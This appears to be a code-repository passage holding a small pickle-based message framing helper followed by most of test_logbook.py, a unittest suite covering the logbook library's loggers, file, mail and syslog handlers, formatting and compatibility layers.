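# without any network I/O so the protocol can be exercised standalone.
def frame_payload(payloadattachment, headersize=10):
    """Serialize a payload tuple exactly the way sendToServer does."""
    payload_attach = pickle.dumps(payloadattachment)
    return bytes(f"{len(payload_attach):<{headersize}}", 'utf-8') + payload_attach
def unframe_payload(framed, headersize=10):
    """Recover the payload tuple from a framed message (inverse of frame_payload)."""
    msglen = int(framed[:headersize])
    return pickle.loads(framed[headersize:headersize + msglen])
# Round trip: unframe_payload(frame_payload(("last-uploaded",))) == ("last-uploaded",)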
|
test_logbook.py
|
# -*- coding: utf-8 -*-
from .utils import (
LogbookTestCase,
activate_via_push_pop,
activate_via_with_statement,
capturing_stderr_context,
get_total_delta_seconds,
make_fake_mail_handler,
missing,
require_module,
require_py3,
)
from contextlib import closing, contextmanager
from datetime import datetime, timedelta
from random import randrange
import logbook
from logbook.helpers import StringIO, xrange, iteritems, zip, u
import os
import pickle
import re
import shutil
import socket
import sys
import tempfile
import time
import json
import base64
try:
from gevent import thread
except ImportError:
try:
import thread
except ImportError:
import _thread as thread
import unittest
import six
def _total_seconds(delta):
"""
Replacement for datetime.timedelta.total_seconds() for Python 2.5, 2.6 and 3.1
"""
return (delta.microseconds + (delta.seconds + delta.days * 24 * 3600) * 10**6) / 10**6
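# Illustrative check (not used by the tests below): the manual computation in
# _total_seconds matches timedelta.total_seconds() where the latter exists
# (Python >= 2.7 / 3.2).
def _check_total_seconds_equivalence():
    delta = timedelta(days=1, seconds=30)
    assert _total_seconds(delta) == 86430  # 24 * 3600 + 30
    return _total_seconds(delta)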
test_file = __file__.rstrip('co')
__file_without_pyc__ = __file__
if __file_without_pyc__.endswith(".pyc"):
__file_without_pyc__ = __file_without_pyc__[:-1]
LETTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
class _BasicAPITestCase(LogbookTestCase):
def test_basic_logging(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
self.log.warn('This is a warning. Nice hah?')
self.assert_(handler.has_warning('This is a warning. Nice hah?'))
self.assertEqual(handler.formatted_records, [
'[WARNING] testlogger: This is a warning. Nice hah?'
])
def test_extradict(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
self.log.warn('Test warning')
record = handler.records[0]
record.extra['existing'] = 'foo'
self.assertEqual(record.extra['nonexisting'], '')
self.assertEqual(record.extra['existing'], 'foo')
self.assertEqual(repr(record.extra),
'ExtraDict({\'existing\': \'foo\'})')
def test_custom_logger(self):
client_ip = '127.0.0.1'
class CustomLogger(logbook.Logger):
def process_record(self, record):
record.extra['ip'] = client_ip
custom_log = CustomLogger('awesome logger')
fmt = '[{record.level_name}] {record.channel}: ' \
'{record.message} [{record.extra[ip]}]'
handler = logbook.TestHandler(format_string=fmt)
self.assertEqual(handler.format_string, fmt)
with self.thread_activation_strategy(handler):
custom_log.warn('Too many sounds')
self.log.warn('"Music" playing')
self.assertEqual(handler.formatted_records, [
'[WARNING] awesome logger: Too many sounds [127.0.0.1]',
'[WARNING] testlogger: "Music" playing []'
])
def test_handler_exception(self):
class ErroringHandler(logbook.TestHandler):
def emit(self, record):
raise RuntimeError('something bad happened')
with capturing_stderr_context() as stderr:
with self.thread_activation_strategy(ErroringHandler()) as handler:
self.log.warn('I warn you.')
self.assert_('something bad happened' in stderr.getvalue())
self.assert_('I warn you' not in stderr.getvalue())
def test_formatting_exception(self):
def make_record():
return logbook.LogRecord('Test Logger', logbook.WARNING,
'Hello {foo:invalid}',
kwargs={'foo': 42},
frame=sys._getframe())
record = make_record()
with self.assertRaises(TypeError) as caught:
record.message
errormsg = str(caught.exception)
self.assertRegexpMatches(errormsg,
"Could not format message with provided arguments: Invalid (?:format specifier)|(?:conversion specification)|(?:format spec)")
self.assertIn("msg='Hello {foo:invalid}'", errormsg)
self.assertIn('args=()', errormsg)
self.assertIn("kwargs={'foo': 42}", errormsg)
self.assertRegexpMatches(
errormsg,
r'Happened in file .*%s, line \d+' % __file_without_pyc__)
def test_exception_catching(self):
logger = logbook.Logger('Test')
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
self.assertFalse(handler.has_error())
try:
1 / 0
except Exception:
logger.exception()
try:
1 / 0
except Exception:
logger.exception('Awesome')
self.assert_(handler.has_error('Uncaught exception occurred'))
self.assert_(handler.has_error('Awesome'))
self.assertIsNotNone(handler.records[0].exc_info)
self.assertIn('1 / 0', handler.records[0].formatted_exception)
def test_exc_info_tuple(self):
self._test_exc_info(as_tuple=True)
def test_exc_info_true(self):
self._test_exc_info(as_tuple=False)
def _test_exc_info(self, as_tuple):
logger = logbook.Logger("Test")
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
try:
1 / 0
except Exception:
exc_info = sys.exc_info()
logger.info("Exception caught", exc_info=exc_info if as_tuple else True)
self.assertIsNotNone(handler.records[0].exc_info)
self.assertEquals(handler.records[0].exc_info, exc_info)
def test_exporting(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
try:
1 / 0
except Exception:
self.log.exception()
record = handler.records[0]
exported = record.to_dict()
record.close()
imported = logbook.LogRecord.from_dict(exported)
for key, value in iteritems(record.__dict__):
if key[0] == '_':
continue
self.assertEqual(value, getattr(imported, key))
def test_pickle(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
try:
1 / 0
except Exception:
self.log.exception()
record = handler.records[0]
record.pull_information()
record.close()
for p in xrange(pickle.HIGHEST_PROTOCOL):
exported = pickle.dumps(record, p)
imported = pickle.loads(exported)
for key, value in iteritems(record.__dict__):
if key[0] == '_':
continue
imported_value = getattr(imported, key)
if isinstance(value, ZeroDivisionError):
# in Python 3.2, ZeroDivisionError(x) != ZeroDivisionError(x)
self.assert_(type(value) is type(imported_value))
self.assertEqual(value.args, imported_value.args)
else:
self.assertEqual(value, imported_value)
def test_timedate_format(self):
"""
tests the logbook.set_datetime_format() function
"""
FORMAT_STRING = '{record.time:%H:%M:%S} {record.message}'
handler = logbook.TestHandler(format_string=FORMAT_STRING)
handler.push_thread()
logbook.set_datetime_format('utc')
try:
self.log.warn('This is a warning.')
time_utc = handler.records[0].time
logbook.set_datetime_format('local')
self.log.warn('This is a warning.')
time_local = handler.records[1].time
finally:
handler.pop_thread()
# put back the default time factory
logbook.set_datetime_format('utc')
# get the expected difference between local and utc time
t1 = datetime.now()
t2 = datetime.utcnow()
tz_minutes_diff = get_total_delta_seconds(t1 - t2)/60.0
if abs(tz_minutes_diff) < 1:
self.skipTest("Cannot test utc/localtime differences if they vary by less than one minute...")
# get the difference between LogRecord local and utc times
logbook_minutes_diff = get_total_delta_seconds(time_local - time_utc)/60.0
self.assertGreater(abs(logbook_minutes_diff), 1, "Localtime does not differ from UTC by more than 1 minute (Local: %s, UTC: %s)" % (time_local, time_utc))
ratio = logbook_minutes_diff / tz_minutes_diff
self.assertGreater(ratio, 0.99)
self.assertLess(ratio, 1.01)
class BasicAPITestCase_Regular(_BasicAPITestCase):
def setUp(self):
super(BasicAPITestCase_Regular, self).setUp()
self.thread_activation_strategy = activate_via_with_statement
class BasicAPITestCase_Contextmgr(_BasicAPITestCase):
def setUp(self):
super(BasicAPITestCase_Contextmgr, self).setUp()
self.thread_activation_strategy = activate_via_push_pop
class _HandlerTestCase(LogbookTestCase):
def setUp(self):
super(_HandlerTestCase, self).setUp()
self.dirname = tempfile.mkdtemp()
self.filename = os.path.join(self.dirname, 'log.tmp')
def tearDown(self):
shutil.rmtree(self.dirname)
super(_HandlerTestCase, self).tearDown()
def test_file_handler(self):
handler = logbook.FileHandler(self.filename,
format_string='{record.level_name}:{record.channel}:'
'{record.message}',)
with self.thread_activation_strategy(handler):
self.log.warn('warning message')
handler.close()
with open(self.filename) as f:
self.assertEqual(f.readline(),
'WARNING:testlogger:warning message\n')
def test_file_handler_unicode(self):
with capturing_stderr_context() as captured:
with self.thread_activation_strategy(logbook.FileHandler(self.filename)) as h:
self.log.info(u('\u0431'))
self.assertFalse(captured.getvalue())
def test_file_handler_delay(self):
handler = logbook.FileHandler(self.filename,
format_string='{record.level_name}:{record.channel}:'
'{record.message}', delay=True)
self.assertFalse(os.path.isfile(self.filename))
with self.thread_activation_strategy(handler):
self.log.warn('warning message')
handler.close()
with open(self.filename) as f:
self.assertEqual(f.readline(),
'WARNING:testlogger:warning message\n')
def test_monitoring_file_handler(self):
if os.name == "nt":
self.skipTest("unsupported on windows due to different IO (also unneeded)")
handler = logbook.MonitoringFileHandler(self.filename,
format_string='{record.level_name}:{record.channel}:'
'{record.message}', delay=True)
with self.thread_activation_strategy(handler):
self.log.warn('warning message')
os.rename(self.filename, self.filename + '.old')
self.log.warn('another warning message')
handler.close()
with open(self.filename) as f:
self.assertEqual(f.read().strip(),
'WARNING:testlogger:another warning message')
def test_custom_formatter(self):
def custom_format(record, handler):
return record.level_name + ':' + record.message
handler = logbook.FileHandler(self.filename)
with self.thread_activation_strategy(handler):
handler.formatter = custom_format
self.log.warn('Custom formatters are awesome')
with open(self.filename) as f:
self.assertEqual(f.readline(),
'WARNING:Custom formatters are awesome\n')
def test_rotating_file_handler(self):
basename = os.path.join(self.dirname, 'rot.log')
handler = logbook.RotatingFileHandler(basename, max_size=2048,
backup_count=3,
)
handler.format_string = '{record.message}'
with self.thread_activation_strategy(handler):
for c, x in zip(LETTERS, xrange(32)):
self.log.warn(c * 256)
files = [x for x in os.listdir(self.dirname)
if x.startswith('rot.log')]
files.sort()
self.assertEqual(files, ['rot.log', 'rot.log.1', 'rot.log.2',
'rot.log.3'])
with open(basename) as f:
self.assertEqual(f.readline().rstrip(), 'C' * 256)
self.assertEqual(f.readline().rstrip(), 'D' * 256)
self.assertEqual(f.readline().rstrip(), 'E' * 256)
self.assertEqual(f.readline().rstrip(), 'F' * 256)
def test_timed_rotating_file_handler(self):
basename = os.path.join(self.dirname, 'trot.log')
handler = logbook.TimedRotatingFileHandler(basename, backup_count=3)
handler.format_string = '[{record.time:%H:%M}] {record.message}'
def fake_record(message, year, month, day, hour=0,
minute=0, second=0):
lr = logbook.LogRecord('Test Logger', logbook.WARNING,
message)
lr.time = datetime(year, month, day, hour, minute, second)
return lr
with self.thread_activation_strategy(handler):
for x in xrange(10):
handler.handle(fake_record('First One', 2010, 1, 5, x + 1))
for x in xrange(20):
handler.handle(fake_record('Second One', 2010, 1, 6, x + 1))
for x in xrange(10):
handler.handle(fake_record('Third One', 2010, 1, 7, x + 1))
for x in xrange(20):
handler.handle(fake_record('Last One', 2010, 1, 8, x + 1))
files = sorted(
x for x in os.listdir(self.dirname) if x.startswith('trot')
)
self.assertEqual(files, ['trot-2010-01-06.log', 'trot-2010-01-07.log',
'trot-2010-01-08.log'])
with open(os.path.join(self.dirname, 'trot-2010-01-08.log')) as f:
self.assertEqual(f.readline().rstrip(), '[01:00] Last One')
self.assertEqual(f.readline().rstrip(), '[02:00] Last One')
with open(os.path.join(self.dirname, 'trot-2010-01-07.log')) as f:
self.assertEqual(f.readline().rstrip(), '[01:00] Third One')
self.assertEqual(f.readline().rstrip(), '[02:00] Third One')
def test_mail_handler(self):
subject = u('\xf8nicode')
handler = make_fake_mail_handler(subject=subject)
with capturing_stderr_context() as fallback:
with self.thread_activation_strategy(handler):
self.log.warn('This is not mailed')
try:
1 / 0
except Exception:
self.log.exception(u('Viva la Espa\xf1a'))
if not handler.mails:
# if sending the mail failed, the reason should be on stderr
self.fail(fallback.getvalue())
self.assertEqual(len(handler.mails), 1)
sender, receivers, mail = handler.mails[0]
mail = mail.replace("\r", "")
self.assertEqual(sender, handler.from_addr)
self.assert_('=?utf-8?q?=C3=B8nicode?=' in mail)
header, data = mail.split("\n\n", 1)
if "Content-Transfer-Encoding: base64" in header:
data = base64.b64decode(data).decode("utf-8")
self.assertRegexpMatches(data, 'Message type:\s+ERROR')
self.assertRegexpMatches(data, 'Location:.*%s' % __file_without_pyc__)
self.assertRegexpMatches(data, 'Module:\s+%s' % __name__)
self.assertRegexpMatches(data, 'Function:\s+test_mail_handler')
body = u('Viva la Espa\xf1a')
if sys.version_info < (3, 0):
body = body.encode('utf-8')
self.assertIn(body, data)
self.assertIn('\nTraceback (most', data)
self.assertIn('1 / 0', data)
self.assertIn('This is not mailed', fallback.getvalue())
def test_mail_handler_record_limits(self):
suppression_test = re.compile('This message occurred additional \d+ '
'time\(s\) and was suppressed').search
handler = make_fake_mail_handler(record_limit=1,
record_delta=timedelta(seconds=0.5))
with self.thread_activation_strategy(handler):
later = datetime.utcnow() + timedelta(seconds=1.1)
while datetime.utcnow() < later:
self.log.error('Over and over...')
# first mail that is always delivered + 0.5 seconds * 2
# and 0.1 seconds of room for rounding errors makes 3 mails
self.assertEqual(len(handler.mails), 3)
# first mail is always delivered
self.assert_(not suppression_test(handler.mails[0][2]))
# the next two have a suppression count
self.assert_(suppression_test(handler.mails[1][2]))
self.assert_(suppression_test(handler.mails[2][2]))
def test_mail_handler_batching(self):
mail_handler = make_fake_mail_handler()
handler = logbook.FingersCrossedHandler(mail_handler, reset=True)
with self.thread_activation_strategy(handler):
self.log.warn('Testing')
self.log.debug('Even more')
self.log.error('And this triggers it')
self.log.info('Aha')
self.log.error('And this triggers it again!')
self.assertEqual(len(mail_handler.mails), 2)
mail = mail_handler.mails[0][2]
pieces = mail.split('Log records that led up to this one:')
self.assertEqual(len(pieces), 2)
body, rest = pieces
rest = rest.replace("\r", "")
self.assertRegexpMatches(body, 'Message type:\s+ERROR')
self.assertRegexpMatches(body, 'Module:\s+%s' % __name__)
self.assertRegexpMatches(body, 'Function:\s+test_mail_handler_batching')
related = rest.strip().split('\n\n')
self.assertEqual(len(related), 2)
self.assertRegexpMatches(related[0], 'Message type:\s+WARNING')
self.assertRegexpMatches(related[1], 'Message type:\s+DEBUG')
self.assertIn('And this triggers it again', mail_handler.mails[1][2])
def test_group_handler_mail_combo(self):
mail_handler = make_fake_mail_handler(level=logbook.DEBUG)
handler = logbook.GroupHandler(mail_handler)
with self.thread_activation_strategy(handler):
self.log.error('The other way round')
self.log.warn('Testing')
self.log.debug('Even more')
self.assertEqual(mail_handler.mails, [])
self.assertEqual(len(mail_handler.mails), 1)
mail = mail_handler.mails[0][2]
pieces = mail.split('Other log records in the same group:')
self.assertEqual(len(pieces), 2)
body, rest = pieces
rest = rest.replace("\r", "")
self.assertRegexpMatches(body, 'Message type:\s+ERROR')
self.assertRegexpMatches(body, 'Module:\s+'+__name__)
self.assertRegexpMatches(body, 'Function:\s+test_group_handler_mail_combo')
related = rest.strip().split('\n\n')
self.assertEqual(len(related), 2)
self.assertRegexpMatches(related[0], 'Message type:\s+WARNING')
self.assertRegexpMatches(related[1], 'Message type:\s+DEBUG')
def test_syslog_handler(self):
to_test = [
(socket.AF_INET, ('127.0.0.1', 0)),
]
if hasattr(socket, 'AF_UNIX'):
to_test.append((socket.AF_UNIX, self.filename))
for sock_family, address in to_test:
with closing(socket.socket(sock_family, socket.SOCK_DGRAM)) as inc:
inc.bind(address)
inc.settimeout(1)
for app_name in [None, 'Testing']:
handler = logbook.SyslogHandler(app_name, inc.getsockname())
with self.thread_activation_strategy(handler):
self.log.warn('Syslog is weird')
try:
rv = inc.recvfrom(1024)[0]
except socket.error:
self.fail('got timeout on socket')
self.assertEqual(rv, (
u('<12>%stestlogger: Syslog is weird\x00') %
(app_name and app_name + u(':') or u(''))).encode('utf-8'))
def test_handler_processors(self):
handler = make_fake_mail_handler(format_string='''\
Subject: Application Error for {record.extra[path]} [{record.extra[method]}]
Message type: {record.level_name}
Location: {record.filename}:{record.lineno}
Module: {record.module}
Function: {record.func_name}
Time: {record.time:%Y-%m-%d %H:%M:%S}
Remote IP: {record.extra[ip]}
Request: {record.extra[path]} [{record.extra[method]}]
Message:
{record.message}
''')
class Request(object):
remote_addr = '127.0.0.1'
method = 'GET'
path = '/index.html'
def handle_request(request):
def inject_extra(record):
record.extra['ip'] = request.remote_addr
record.extra['method'] = request.method
record.extra['path'] = request.path
processor = logbook.Processor(inject_extra)
with self.thread_activation_strategy(processor):
handler.push_thread()
try:
try:
1 / 0
except Exception:
self.log.exception('Exception happened during request')
finally:
handler.pop_thread()
handle_request(Request())
self.assertEqual(len(handler.mails), 1)
mail = handler.mails[0][2]
self.assertIn('Subject: Application Error '
'for /index.html [GET]', mail)
self.assertIn('1 / 0', mail)
def test_regex_matching(self):
test_handler = logbook.TestHandler()
with self.thread_activation_strategy(test_handler):
self.log.warn('Hello World!')
self.assert_(test_handler.has_warning(re.compile('^Hello')))
self.assert_(not test_handler.has_warning(re.compile('world$')))
self.assert_(not test_handler.has_warning('^Hello World'))
def test_custom_handling_test(self):
class MyTestHandler(logbook.TestHandler):
def handle(self, record):
if record.extra.get('flag') != 'testing':
return False
return logbook.TestHandler.handle(self, record)
class MyLogger(logbook.Logger):
def process_record(self, record):
logbook.Logger.process_record(self, record)
record.extra['flag'] = 'testing'
log = MyLogger()
handler = MyTestHandler()
with capturing_stderr_context() as captured:
with self.thread_activation_strategy(handler):
log.warn('From my logger')
self.log.warn('From another logger')
self.assert_(handler.has_warning('From my logger'))
self.assertIn('From another logger', captured.getvalue())
def test_custom_handling_tester(self):
flag = True
class MyTestHandler(logbook.TestHandler):
def should_handle(self, record):
return flag
null_handler = logbook.NullHandler()
with self.thread_activation_strategy(null_handler):
test_handler = MyTestHandler()
with self.thread_activation_strategy(test_handler):
self.log.warn('1')
flag = False
self.log.warn('2')
self.assert_(test_handler.has_warning('1'))
self.assert_(not test_handler.has_warning('2'))
def test_null_handler(self):
with capturing_stderr_context() as captured:
with self.thread_activation_strategy(logbook.NullHandler()) as null_handler:
with self.thread_activation_strategy(logbook.TestHandler(level='ERROR')) as handler:
self.log.error('An error')
self.log.warn('A warning')
self.assertEqual(captured.getvalue(), '')
self.assertFalse(handler.has_warning('A warning'))
self.assert_(handler.has_error('An error'))
def test_test_handler_cache(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
self.log.warn('First line')
self.assertEqual(len(handler.formatted_records),1)
cache = handler.formatted_records # store cache, to make sure it is identifiable
self.assertEqual(len(handler.formatted_records),1)
self.assert_(cache is handler.formatted_records) # Make sure cache is not invalidated without changes to record
self.log.warn('Second line invalidates cache')
self.assertEqual(len(handler.formatted_records),2)
self.assertFalse(cache is handler.formatted_records) # Make sure cache is invalidated when records change
def test_blackhole_setting(self):
null_handler = logbook.NullHandler()
heavy_init = logbook.LogRecord.heavy_init
with self.thread_activation_strategy(null_handler):
def new_heavy_init(self):
raise RuntimeError('should not be triggered')
logbook.LogRecord.heavy_init = new_heavy_init
try:
with self.thread_activation_strategy(null_handler):
logbook.warn('Awesome')
finally:
logbook.LogRecord.heavy_init = heavy_init
null_handler.bubble = True
with capturing_stderr_context() as captured:
logbook.warning('Not a blackhole')
self.assertNotEqual(captured.getvalue(), '')
def test_calling_frame(self):
handler = logbook.TestHandler()
with self.thread_activation_strategy(handler):
logbook.warn('test')
self.assertEqual(handler.records[0].calling_frame, sys._getframe())
def test_nested_setups(self):
with capturing_stderr_context() as captured:
logger = logbook.Logger('App')
test_handler = logbook.TestHandler(level='WARNING')
mail_handler = make_fake_mail_handler(bubble=True)
handlers = logbook.NestedSetup([
logbook.NullHandler(),
test_handler,
mail_handler
])
with self.thread_activation_strategy(handlers):
logger.warn('This is a warning')
logger.error('This is also a mail')
try:
1 / 0
except Exception:
logger.exception()
logger.warn('And here we go straight back to stderr')
self.assert_(test_handler.has_warning('This is a warning'))
self.assert_(test_handler.has_error('This is also a mail'))
self.assertEqual(len(mail_handler.mails), 2)
self.assertIn('This is also a mail', mail_handler.mails[0][2])
self.assertIn('1 / 0', mail_handler.mails[1][2])
self.assertIn('And here we go straight back to stderr',
captured.getvalue())
with self.thread_activation_strategy(handlers):
logger.warn('threadbound warning')
handlers.push_application()
try:
logger.warn('applicationbound warning')
finally:
handlers.pop_application()
def test_dispatcher(self):
logger = logbook.Logger('App')
with self.thread_activation_strategy(logbook.TestHandler()) as test_handler:
logger.warn('Logbook is too awesome for stdlib')
self.assertEqual(test_handler.records[0].dispatcher, logger)
def test_filtering(self):
logger1 = logbook.Logger('Logger1')
logger2 = logbook.Logger('Logger2')
handler = logbook.TestHandler()
outer_handler = logbook.TestHandler()
def only_1(record, handler):
return record.dispatcher is logger1
handler.filter = only_1
with self.thread_activation_strategy(outer_handler):
with self.thread_activation_strategy(handler):
logger1.warn('foo')
logger2.warn('bar')
self.assert_(handler.has_warning('foo', channel='Logger1'))
self.assertFalse(handler.has_warning('bar', channel='Logger2'))
self.assertFalse(outer_handler.has_warning('foo', channel='Logger1'))
self.assert_(outer_handler.has_warning('bar', channel='Logger2'))
def test_null_handler_filtering(self):
logger1 = logbook.Logger("1")
logger2 = logbook.Logger("2")
outer = logbook.TestHandler()
inner = logbook.NullHandler()
inner.filter = lambda record, handler: record.dispatcher is logger1
with self.thread_activation_strategy(outer):
with self.thread_activation_strategy(inner):
logger1.warn("1")
logger2.warn("2")
self.assertTrue(outer.has_warning("2", channel="2"))
self.assertFalse(outer.has_warning("1", channel="1"))
def test_different_context_pushing(self):
h1 = logbook.TestHandler(level=logbook.DEBUG)
h2 = logbook.TestHandler(level=logbook.INFO)
h3 = logbook.TestHandler(level=logbook.WARNING)
logger = logbook.Logger('Testing')
with self.thread_activation_strategy(h1):
with self.thread_activation_strategy(h2):
with self.thread_activation_strategy(h3):
logger.warn('Wuuu')
logger.info('still awesome')
logger.debug('puzzled')
self.assert_(h1.has_debug('puzzled'))
self.assert_(h2.has_info('still awesome'))
self.assert_(h3.has_warning('Wuuu'))
for handler in h1, h2, h3:
self.assertEquals(len(handler.records), 1)
def test_global_functions(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
logbook.debug('a debug message')
logbook.info('an info message')
logbook.warn('warning part 1')
logbook.warning('warning part 2')
logbook.notice('notice')
logbook.error('an error')
logbook.critical('pretty critical')
logbook.log(logbook.CRITICAL, 'critical too')
self.assert_(handler.has_debug('a debug message'))
self.assert_(handler.has_info('an info message'))
self.assert_(handler.has_warning('warning part 1'))
self.assert_(handler.has_warning('warning part 2'))
self.assert_(handler.has_notice('notice'))
self.assert_(handler.has_error('an error'))
self.assert_(handler.has_critical('pretty critical'))
self.assert_(handler.has_critical('critical too'))
self.assertEqual(handler.records[0].channel, 'Generic')
self.assertIsNone(handler.records[0].dispatcher)
def test_fingerscrossed(self):
handler = logbook.FingersCrossedHandler(logbook.default_handler,
logbook.WARNING)
# if no warning occurs, the infos are not logged
with self.thread_activation_strategy(handler):
with capturing_stderr_context() as captured:
self.log.info('some info')
self.assertEqual(captured.getvalue(), '')
self.assert_(not handler.triggered)
# but if it does, all log messages are output
with self.thread_activation_strategy(handler):
with capturing_stderr_context() as captured:
self.log.info('some info')
self.log.warning('something happened')
self.log.info('something else happened')
logs = captured.getvalue()
self.assert_('some info' in logs)
self.assert_('something happened' in logs)
self.assert_('something else happened' in logs)
self.assert_(handler.triggered)
def test_fingerscrossed_factory(self):
handlers = []
def handler_factory(record, fch):
handler = logbook.TestHandler()
handlers.append(handler)
return handler
def make_fch():
return logbook.FingersCrossedHandler(handler_factory,
logbook.WARNING)
fch = make_fch()
with self.thread_activation_strategy(fch):
self.log.info('some info')
self.assertEqual(len(handlers), 0)
self.log.warning('a warning')
self.assertEqual(len(handlers), 1)
self.log.error('an error')
self.assertEqual(len(handlers), 1)
self.assert_(handlers[0].has_infos)
self.assert_(handlers[0].has_warnings)
self.assert_(handlers[0].has_errors)
self.assert_(not handlers[0].has_notices)
self.assert_(not handlers[0].has_criticals)
self.assert_(not handlers[0].has_debugs)
fch = make_fch()
with self.thread_activation_strategy(fch):
self.log.info('some info')
self.log.warning('a warning')
self.assertEqual(len(handlers), 2)
def test_fingerscrossed_buffer_size(self):
logger = logbook.Logger('Test')
test_handler = logbook.TestHandler()
handler = logbook.FingersCrossedHandler(test_handler, buffer_size=3)
with self.thread_activation_strategy(handler):
logger.info('Never gonna give you up')
logger.warn('Aha!')
logger.warn('Moar!')
logger.error('Pure hate!')
self.assertEqual(test_handler.formatted_records, [
'[WARNING] Test: Aha!',
'[WARNING] Test: Moar!',
'[ERROR] Test: Pure hate!'
])
class HandlerTestCase_Regular(_HandlerTestCase):
def setUp(self):
super(HandlerTestCase_Regular, self).setUp()
self.thread_activation_strategy = activate_via_push_pop
class HandlerTestCase_Contextmgr(_HandlerTestCase):
def setUp(self):
super(HandlerTestCase_Contextmgr, self).setUp()
self.thread_activation_strategy = activate_via_with_statement
class AttributeTestCase(LogbookTestCase):
def test_level_properties(self):
self.assertEqual(self.log.level, logbook.NOTSET)
self.assertEqual(self.log.level_name, 'NOTSET')
self.log.level_name = 'WARNING'
self.assertEqual(self.log.level, logbook.WARNING)
self.log.level = logbook.ERROR
self.assertEqual(self.log.level_name, 'ERROR')
def test_reflected_properties(self):
group = logbook.LoggerGroup()
group.add_logger(self.log)
self.assertEqual(self.log.group, group)
group.level = logbook.ERROR
self.assertEqual(self.log.level, logbook.ERROR)
self.assertEqual(self.log.level_name, 'ERROR')
group.level = logbook.WARNING
self.assertEqual(self.log.level, logbook.WARNING)
self.assertEqual(self.log.level_name, 'WARNING')
self.log.level = logbook.CRITICAL
group.level = logbook.DEBUG
self.assertEqual(self.log.level, logbook.CRITICAL)
self.assertEqual(self.log.level_name, 'CRITICAL')
group.remove_logger(self.log)
self.assertEqual(self.log.group, None)
class LevelLookupTest(LogbookTestCase):
def test_level_lookup_failures(self):
with self.assertRaises(LookupError):
logbook.get_level_name(37)
with self.assertRaises(LookupError):
logbook.lookup_level('FOO')
class FlagsTestCase(LogbookTestCase):
def test_error_flag(self):
with capturing_stderr_context() as captured:
with logbook.Flags(errors='print'):
with logbook.Flags(errors='silent'):
self.log.warn('Foo {42}', 'aha')
self.assertEqual(captured.getvalue(), '')
with logbook.Flags(errors='silent'):
with logbook.Flags(errors='print'):
self.log.warn('Foo {42}', 'aha')
self.assertNotEqual(captured.getvalue(), '')
with self.assertRaises(Exception) as caught:
with logbook.Flags(errors='raise'):
self.log.warn('Foo {42}', 'aha')
self.assertIn('Could not format message with provided '
'arguments', str(caught.exception))
def test_disable_introspection(self):
with logbook.Flags(introspection=False):
with logbook.TestHandler() as h:
self.log.warn('Testing')
self.assertIsNone(h.records[0].frame)
self.assertIsNone(h.records[0].calling_frame)
self.assertIsNone(h.records[0].module)
class LoggerGroupTestCase(LogbookTestCase):
def test_groups(self):
def inject_extra(record):
record.extra['foo'] = 'bar'
group = logbook.LoggerGroup(processor=inject_extra)
group.level = logbook.ERROR
group.add_logger(self.log)
with logbook.TestHandler() as handler:
self.log.warn('A warning')
self.log.error('An error')
self.assertFalse(handler.has_warning('A warning'))
self.assertTrue(handler.has_error('An error'))
self.assertEqual(handler.records[0].extra['foo'], 'bar')
class DefaultConfigurationTestCase(LogbookTestCase):
def test_default_handlers(self):
with capturing_stderr_context() as stream:
self.log.warn('Aha!')
captured = stream.getvalue()
self.assertIn('WARNING: testlogger: Aha!', captured)
class LoggingCompatTestCase(LogbookTestCase):
def test_basic_compat_with_level_setting(self):
self._test_basic_compat(True)
def test_basic_compat_without_level_setting(self):
self._test_basic_compat(False)
def _test_basic_compat(self, set_root_logger_level):
import logging
from logbook.compat import redirected_logging
# mimic the default logging setting
self.addCleanup(logging.root.setLevel, logging.root.level)
logging.root.setLevel(logging.WARNING)
name = 'test_logbook-%d' % randrange(1 << 32)
logger = logging.getLogger(name)
with logbook.TestHandler(bubble=True) as handler:
with capturing_stderr_context() as captured:
with redirected_logging(set_root_logger_level):
logger.debug('This is from the old system')
logger.info('This is from the old system')
logger.warn('This is from the old system')
logger.error('This is from the old system')
logger.critical('This is from the old system')
self.assertIn(('WARNING: %s: This is from the old system' % name),
captured.getvalue())
if set_root_logger_level:
self.assertEquals(handler.records[0].level, logbook.DEBUG)
else:
self.assertEquals(handler.records[0].level, logbook.WARNING)
def test_redirect_logbook(self):
import logging
from logbook.compat import LoggingHandler
out = StringIO()
logger = logging.getLogger()
old_handlers = logger.handlers[:]
handler = logging.StreamHandler(out)
handler.setFormatter(logging.Formatter(
'%(name)s:%(levelname)s:%(message)s'))
logger.handlers[:] = [handler]
try:
with LoggingHandler() as logging_handler:
self.log.warn("This goes to logging")
pieces = out.getvalue().strip().split(':')
self.assertEqual(pieces, [
'testlogger',
'WARNING',
'This goes to logging'
])
finally:
logger.handlers[:] = old_handlers
class WarningsCompatTestCase(LogbookTestCase):
def test_warning_redirections(self):
from logbook.compat import redirected_warnings
with logbook.TestHandler() as handler:
redirector = redirected_warnings()
redirector.start()
try:
from warnings import warn
warn(RuntimeWarning('Testing'))
finally:
redirector.end()
self.assertEqual(len(handler.records), 1)
self.assertEqual('[WARNING] RuntimeWarning: Testing',
handler.formatted_records[0])
self.assertIn(__file_without_pyc__, handler.records[0].filename)
class MoreTestCase(LogbookTestCase):
@contextmanager
def _get_temporary_file_context(self):
fn = tempfile.mktemp()
try:
yield fn
finally:
try:
os.remove(fn)
except OSError:
pass
@require_module('jinja2')
def test_jinja_formatter(self):
from logbook.more import JinjaFormatter
fmter = JinjaFormatter('{{ record.channel }}/{{ record.level_name }}')
handler = logbook.TestHandler()
handler.formatter = fmter
with handler:
self.log.info('info')
self.assertIn('testlogger/INFO', handler.formatted_records)
@missing('jinja2')
def test_missing_jinja2(self):
from logbook.more import JinjaFormatter
# check the RuntimeError is raised
with self.assertRaises(RuntimeError):
JinjaFormatter('dummy')
def test_colorizing_support(self):
from logbook.more import ColorizedStderrHandler
class TestColorizingHandler(ColorizedStderrHandler):
def should_colorize(self, record):
return True
stream = StringIO()
with TestColorizingHandler(format_string='{record.message}') as handler:
self.log.error('An error')
self.log.warn('A warning')
self.log.debug('A debug message')
lines = handler.stream.getvalue().rstrip('\n').splitlines()
self.assertEqual(lines, [
